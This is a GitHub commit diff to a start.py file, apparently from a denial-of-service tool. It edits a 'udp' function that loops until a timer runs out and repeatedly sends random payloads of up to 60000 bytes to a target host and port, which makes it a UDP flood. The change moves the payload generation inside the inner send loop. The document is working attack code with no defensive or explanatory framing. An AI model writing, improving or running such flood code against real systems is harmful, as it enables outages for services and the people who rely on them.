Update start.py

This commit is contained in:
MHProDev 2021-03-20 03:26:05 +03:30 committed by GitHub
parent d5fde3f59e
commit 578523a306
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -257,8 +257,8 @@ def udp(event, timer):
while time.time() < timer:
try:
try:
data = random._urandom(int(Intn(1024, 60000)))
for _ in range(multiple):
data = random._urandom(int(Intn(1024, 60000)))
s.sendto(data, (str(target), int(port)))
except:
s.close()